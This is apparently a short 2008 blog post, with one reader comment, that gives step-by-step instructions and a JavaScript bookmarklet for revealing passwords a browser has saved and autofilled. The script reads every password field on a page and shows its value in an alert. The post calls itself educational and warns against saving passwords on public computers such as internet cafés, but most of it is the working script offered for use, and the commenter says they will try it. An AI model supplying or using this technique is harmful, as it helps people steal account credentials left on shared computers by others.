Hacking Browser Saved Password
- November 18, 2008
- 2 Comments
- 31337
- Posted by Gee
Hacking Browser Saved Password
This post is for educational purposes only i just want to show you not to practice saving your password on public computers such as internet cafe’s!
STEP:
1) this looks familiar if you save your password on your friendster look at the image below
2) copy and paste the javascript code in your browser “Navigation Toolbar”
3) hit enter and the saved password will show
code:
javascript:var a = new String();
for (var i = 0; i < document.forms.length; i++) {
for (var j = 0; j < document.forms[i].elements.length; j++) {
if (document.forms[i].elements[j].type == "password") {
a += document.forms[i].elements[j].value; }
}
} alert(a);
thanks to arn-arn for this script
May 1, 2009 at 8:31 AM /
Astig!! Ang galing,try ko yan. -up-